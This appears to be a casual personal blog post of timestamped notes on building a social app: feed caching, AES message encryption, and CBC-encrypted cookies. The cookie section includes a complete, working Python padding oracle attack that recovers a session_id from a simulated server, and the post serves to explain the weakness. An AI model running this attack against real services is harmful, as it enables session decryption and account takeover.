Algorithms Everywhere. Probably Part I

0827: Issues with database management: this was something I had not fully considered (although I had known of this issue from the Zucc's CS50 Harvard lecture). The problem goes like this: you have, say, $N$ users, and on average each of these $N$ users can be attributed $\sim N$ corresponding connections (could be social connections, posts, blah blah). So the volume of data would scale like $O(N^{2})$. However, we usually have to consider more complicated cases than just posts and social connections (i.e. finding mutuals), which boils down to a graph shortest-distance problem, which is Algorithms 101. The more complicated stuff usually involves the management of the heavier data (messages, pictures, videos, etc.), for which fortunately there does exist a pretty good workaround: compressing the pictures on the client side (to save resources on the server side, because compressing tonnes of pictures and videos on the server at a rate of $N$ times the average data size, say $M$ megabytes per second, would suck the servers dry worse than the 634-in-a-day thing). There's another algorithms problem that arises with this, which is that on average some data is not always going to be retrieved from the database and will instead ``stay on the caching layer" so-to-speak, and deciding what data should be available like this is an optimization problem. I could say, for instance, that I want the feed to not refresh every time a user logs in, and basically keep a temporary log of what posts/stuff was displayed the first time the user logged in. So if the user has lost data connection, it becomes easier to just display previous posts and say ``oops, your data kinda sucks right now" (if you're using AT&T it sucked always) instead of throwing a BSOD and kind of shitting up the atmosphere of the website. But we can't just keep track of every post a user has ever received, because (a) that is unbounded, and a user could have procrastinated three weeks and spent 23 hours a day scrolling to hit like 50k posts or something, which is too huge, and (b) that's a thing that could fuck with privacy. Or at least that's what I feel.
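To make the bounded-cache idea concrete, here is a minimal sketch of what I mean (names like \texttt{FeedCache} and the cap of 200 are mine, not anything standard): each user keeps at most a fixed number of recently served posts, so the log stays bounded per (a) and old history ages out on its own, which also helps with (b).

\begin{verbatim}
from collections import deque

MAX_CACHED = 200  # hypothetical cap on posts remembered per user

class FeedCache:
    """Bounded per-user cache of recently served posts."""

    def __init__(self, max_posts=MAX_CACHED):
        self.max_posts = max_posts
        self._feeds = {}  # user_id -> deque of post ids

    def record(self, user_id, post_id):
        feed = self._feeds.setdefault(
            user_id, deque(maxlen=self.max_posts))
        feed.append(post_id)  # silently evicts the oldest post once full

    def replay(self, user_id):
        # What to show when the connection drops:
        # the last posts we already served.
        return list(self._feeds.get(user_id, ()))

cache = FeedCache()
for pid in range(1000):
    cache.record("alice", pid)
print(len(cache.replay("alice")))  # 200, not 1000
\end{verbatim}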

0836: Now here's the part that I am dreading. In order to implement messaging functionality, it is important to encrypt messages, because I don't want John to know what Alice and Bob are talking about. My first thought is to go for the usual RSA cryptography algorithm, where we have a private key and a public key and rely on the hardness of prime factorization. But the thing is that RSA is a computationally expensive asymmetric algorithm and takes more time than something like AES, which is a symmetric algorithm and may be better suited for encrypting large data without compromising on encryption time. So I am considering using something like AES 256-bit encryption, which seems to be a pretty good deal. Speaking of 256-bit encryption, it is funny how some brands market themselves saying they use ``military-grade encryption" and ``unbreakable encryption" all while basically doing AES and nothing more. Don't get me wrong, AES is incredibly efficient and ``unbreakable" in the sense that brute-forcing a 256-bit key space is computationally infeasible. But again, not functionally ``military grade" or some fancy shit; it is a very powerful encryption algorithm and not some hocus-pocus that the FBI made.
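For what it's worth, here is a minimal sketch of the symmetric side using the pyca/cryptography package (AES-256 in GCM mode; in a real messenger the shared key would itself be wrapped with RSA or negotiated via a key exchange, which I'm skipping entirely here):

\begin{verbatim}
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Alice and Bob share this 256-bit key out of band (in practice it
# would be wrapped with RSA or come from a key-exchange protocol).
key = AESGCM.generate_key(bit_length=256)

def encrypt_message(key: bytes, plaintext: bytes) -> bytes:
    nonce = os.urandom(12)  # GCM wants a fresh 96-bit nonce per message
    ct = AESGCM(key).encrypt(nonce, plaintext, None)
    return nonce + ct       # ship the nonce alongside the ciphertext

def decrypt_message(key: bytes, blob: bytes) -> bytes:
    nonce, ct = blob[:12], blob[12:]
    return AESGCM(key).decrypt(nonce, ct, None)  # raises if tampered

blob = encrypt_message(key, b"meet at the usual place")
assert decrypt_message(key, blob) == b"meet at the usual place"
\end{verbatim}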

0856: To be clear, messages are not the only place where encryption is an issue. Even if you consider something as straightforward as cookies, you know well enough how complicated this stuff is. The whole basis of cookies and storing session_id's is that the user cannot simply modify them. So you need to implement a good enough encryption scheme, for which the CBC block-cipher mode is usually the first option. The deal with CBC is that you are vulnerable to padding oracle attacks, which are kind of fascinating because they rely on the very foundation of what CBC encryption modes do. Let me illustrate an example schematically.

You start with an initialization vector $X$, which for all CBC purposes is also the zeroth block in the encryption scheme. So you have something like $C_{0}=X$ (indices start from 0 so that the first real block has index 1). We assume that, for all valid purposes, $X$ follows the usual CBC protocol and is truly random and unpredictable. OK. Then we take each plaintext block $P_{i}$, XOR it with the previous ciphertext block $C_{i-1}$, and encrypt the result:

\[ C_{i}=\mathrm{En}\left( P_{i}\oplus C_{i-1} \right)\;, \]

and we generate the subsequent block chaining scheme. Decrypting is the same process run backwards: $P_{i}=\mathrm{De}\left( C_{i} \right)\oplus C_{i-1}$. However, while this may seem quite secure (which it kind of is), the Microsoft ASP.NET vulnerability clearly showed that this ``security" can be worked around with a padding oracle attack, where the attacker makes a series of requests to the oracle to learn about the padding sequence in the block chain. I will leave the technical details to a link to a very good post by Ron Bowes that gives a concrete example of such an attack. But the essential idea is that invalid padding generates an error code, and by tweaking the ciphertext you can use that error to extract information about the padding, then the intermediate state, and as a result the plaintext. So, in such cases, the user can decrypt the session_id. This is an obvious example of the subtle vulnerabilities that might go unnoticed, but it is necessary to have these in mind before making any security decision. And so on and so forth.
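Here is a rough sketch of the single-block version of the attack, under some assumptions of mine: the \texttt{oracle} function below stands in for the vulnerable server (in the ASP.NET case it was an HTTP request whose error response distinguished bad padding), and \texttt{recover\_block} is my hypothetical attacker, recovering a PKCS\#7-padded block without ever touching the key:

\begin{verbatim}
import os
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import (
    Cipher, algorithms, modes)

KEY = os.urandom(16)  # the server's secret; the attacker never sees it

def oracle(fake_prev: bytes, block: bytes) -> bool:
    """Stand-in for the server: decrypt one block in CBC mode with the
    attacker-supplied `fake_prev` as IV, and leak only whether the
    PKCS#7 padding came out valid (the "error code" above)."""
    dec = Cipher(algorithms.AES(KEY), modes.CBC(fake_prev)).decryptor()
    data = dec.update(block) + dec.finalize()
    try:
        unpad = padding.PKCS7(128).unpadder()
        unpad.update(data)
        unpad.finalize()
        return True
    except ValueError:
        return False

def recover_block(prev_block: bytes, block: bytes, size=16) -> bytes:
    """Recover the plaintext of `block` using only the padding oracle."""
    inter = bytearray(size)  # De(block): the pre-XOR intermediate state
    for pad in range(1, size + 1):      # force padding 0x01, 0x02, ...
        pos = size - pad
        fake = bytearray(size)
        for k in range(pos + 1, size):  # make already-known bytes
            fake[k] = inter[k] ^ pad    # decrypt to the padding value
        for guess in range(256):
            fake[pos] = guess
            if oracle(bytes(fake), block):  # leaks De(block)[pos]
                inter[pos] = guess ^ pad    # (pad=1 can rarely false-
                break                       #  positive on 0x02 0x02 etc.)
    return bytes(i ^ c for i, c in zip(inter, prev_block))

# One CBC-encrypted block the attacker intercepted.
iv = os.urandom(16)
padder = padding.PKCS7(128).padder()
pt = padder.update(b"session_id=42") + padder.finalize()
enc = Cipher(algorithms.AES(KEY), modes.CBC(iv)).encryptor()
ct = enc.update(pt) + enc.finalize()

print(recover_block(iv, ct))  # b'session_id=42\x03\x03\x03', no key used
\end{verbatim}

The punchline is that the attacker only ever asks ``did the padding parse?" and still walks away with the plaintext, one byte at a time from the right.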

0959: An even more appealing overall class of problems in cryptography is that of P vs NP, which is an open problem with a lot of applications in cryptography. I will be posting a continuation to this post in a minute. Not that proving $P=NP$ would necessarily give a practical break of supposedly unbreakable cryptosystems like RSA, whose security rests on problems (like factoring) believed to sit outside polynomial time; you would still need a constructive proof with small enough constants. But it is nonetheless important. And not really relevant to our present problem. But that is kinda cool and it lets me make love to my 'Tism which is absolutely fun.
